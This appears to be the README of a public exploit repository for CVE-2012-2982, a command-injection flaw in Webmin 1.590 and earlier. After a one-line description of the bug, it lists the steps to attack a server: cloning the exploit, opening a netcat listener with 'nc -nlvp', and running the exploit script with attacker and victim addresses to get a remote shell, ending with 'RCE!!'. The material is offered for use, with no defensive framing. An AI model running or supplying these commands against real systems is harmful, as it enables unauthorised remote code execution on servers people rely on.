file/show.cgi in Webmin 1.590 and earlier allows remote authenticated users to execute arbitrary commands via an invalid character in a pathname, as demonstrated by a | (pipe) character.
git clone https://github.com/CpyRe/CVE-2012-2982.git
pip3 install -r requirements.txt
nc -nlvp <port>
python3 exp.py <myip> <vulnip> <port>
ORpython3 subprocess-exp.py <myip> <vulnip> <port>
- RCE!!